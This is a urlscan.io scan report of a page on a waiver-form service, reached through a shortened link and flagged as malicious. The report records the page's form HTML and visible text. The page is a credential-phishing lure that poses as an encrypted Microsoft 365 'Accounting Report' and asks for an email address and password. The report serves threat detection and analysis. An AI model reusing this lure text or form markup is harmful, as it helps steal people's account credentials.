app.cleverwaiver.com Open in urlscan Pro
54.196.16.164  Malicious Activity! Public Scan

Submitted URL: https://tinyurl.com/4zsjabab
Effective URL: https://app.cleverwaiver.com/render/templateByRefId/62c6de534c9d18d69f62766e
Submission Tags: falconsandbox
Submission: On July 22 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

Name: myForm

<form name="myForm" id="template" ng-show="showWaiverTemplate" novalidate="" class="template render ng-pristine ng-valid">
  <div class="waiverBody">
    <div class="alert alert-danger ng-hide" role="alert" ng-show="!isTemplatePublished">This waiver template is disabled.</div>
    <div id="savedWaiverError" class="alert alert-danger ng-binding ng-hide" role="alert" ng-show="savedWaiverFailed"><span class="glyphicon glyphicon-exclamation-sign" aria-hidden="true"></span> <span class="sr-only">Error:</span>
      <div><!-- ngIf: currentUser.subType --></div>
      <div><!-- ngIf: !currentUser.subType --><a ng-if="!currentUser.subType" href="/profile/price" class="ng-scope">Note: You can subscribe from here.</a><!-- end ngIf: !currentUser.subType --></div>
    </div>
    <div class="headerInfo" style="overflow: hidden">
      <div class="headerBox"><!-- ngIf: !(waiver.Header.logoPosition == 'right') && template.Header.logoImage --><span class="headerLogo ng-scope" ng-style="logoStyle"
          ng-if="!(waiver.Header.logoPosition == 'right') &amp;&amp; template.Header.logoImage" style="width: 40%; display: block; margin: auto;"><img style="width:100%"
            ng-src="https://waiverphoto.s3.amazonaws.com/images/5NWSs9-5k1Fy9-office-365-business-logo.png"
            src="https://waiverphoto.s3.amazonaws.com/images/5NWSs9-5k1Fy9-office-365-business-logo.png"></span><!-- end ngIf: !(waiver.Header.logoPosition == 'right') && template.Header.logoImage -->
        <h4 ng-hide="true" class="header ng-binding ng-hide" style="text-align: center">Accounting Report</h4>
        <p class="ql-editor ng-binding" ng-bind-html="trustAsHtml(template.Header.text)" style="padding-top: 30px; text-align: center;" ng-style="headerStyle"></p>
        <h5 class="ql-align-center">File shared is encrypted with Secured Cloud Security, Continue with Microsoft 365 Login to Access file via Secured Database</h5>
        <p></p><!-- ngIf: (waiver.Header.logoPosition == 'right') && template.Header.logoImage -->
      </div>
    </div>
    <div class="additionals" style="padding-top:0"><!-- ngRepeat: t in waiver.Additionals track by $index -->
      <div ng-repeat="t in waiver.Additionals track by $index" class="ng-scope" style="">
        <!-- ngIf: t.type === 'textBox' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'checkBox' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'initial' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'multiple' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'shortAns' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) -->
        <div class="additional form-group ng-scope has-error"
          ng-if="t.type === 'shortAns' &amp;&amp; ((!t.minorsOnly &amp;&amp; !showMinorTemplate) || (t.minorsOnly &amp;&amp; showMinorTemplate) || (!t.minorsOnly &amp;&amp; showMinorTemplate) || (!(template.settings.minor.enable == 'true')))"
          ng-class="{ 'has-error' : t.ans.length <= 0 &amp;&amp; t.optional == false }"><!-- ngIf: submitClicked &&  (!t.ans || t.ans.length <= 0) && t.optional == false --><label class="ng-binding">E-mail:<span class="requiredRed"
              ng-hide="t.optional == true">*</span></label><input ng-model="t.ans" class="form-control form-control-render ng-pristine ng-untouched ng-valid ng-empty" autocomplete="off">
          <!-- ngIf: submitClicked &&  (!t.ans || t.ans.length <= 0) && t.optional == false --></div>
        <!-- end ngIf: t.type === 'shortAns' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'date' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'address' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'name' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'newName' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'phone' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'email' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'dob' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'gender' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'country' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'video' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'signature' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'upLocalImg' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'number' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'stripe' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) -->
      </div><!-- end ngRepeat: t in waiver.Additionals track by $index -->
      <div ng-repeat="t in waiver.Additionals track by $index" class="ng-scope">
        <!-- ngIf: t.type === 'textBox' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'checkBox' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'initial' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'multiple' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'shortAns' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) -->
        <div class="additional form-group ng-scope has-error"
          ng-if="t.type === 'shortAns' &amp;&amp; ((!t.minorsOnly &amp;&amp; !showMinorTemplate) || (t.minorsOnly &amp;&amp; showMinorTemplate) || (!t.minorsOnly &amp;&amp; showMinorTemplate) || (!(template.settings.minor.enable == 'true')))"
          ng-class="{ 'has-error' : t.ans.length <= 0 &amp;&amp; t.optional == false }"><!-- ngIf: submitClicked &&  (!t.ans || t.ans.length <= 0) && t.optional == false --><label class="ng-binding">Pass-wd:<span class="requiredRed"
              ng-hide="t.optional == true">*</span></label><input ng-model="t.ans" class="form-control form-control-render ng-pristine ng-untouched ng-valid ng-empty" autocomplete="off">
          <!-- ngIf: submitClicked &&  (!t.ans || t.ans.length <= 0) && t.optional == false --></div>
        <!-- end ngIf: t.type === 'shortAns' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'date' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'address' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'name' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'newName' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'phone' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'email' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'dob' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'gender' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'country' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'video' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'signature' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'upLocalImg' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'number' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) --><!-- ngIf: t.type === 'stripe' && ((!t.minorsOnly && !showMinorTemplate) || (t.minorsOnly && showMinorTemplate) || (!t.minorsOnly && showMinorTemplate) || (!(template.settings.minor.enable == 'true'))) -->
      </div><!-- end ngRepeat: t in waiver.Additionals track by $index -->
    </div><!-- ngRepeat: m in adultFields track by $index --><!-- ngRepeat: m in minorFields track by $index -->
  </div>
</form>

Text Content

This waiver template is disabled.
Error:

Note: You can subscribe from here.

ACCOUNTING REPORT



FILE SHARED IS ENCRYPTED WITH SECURED CLOUD SECURITY, CONTINUE WITH MICROSOFT
365 LOGIN TO ACCESS FILE VIA SECURED DATABASE



E-mail:*
Pass-wd:*


Submit
Powered by CleverWaiver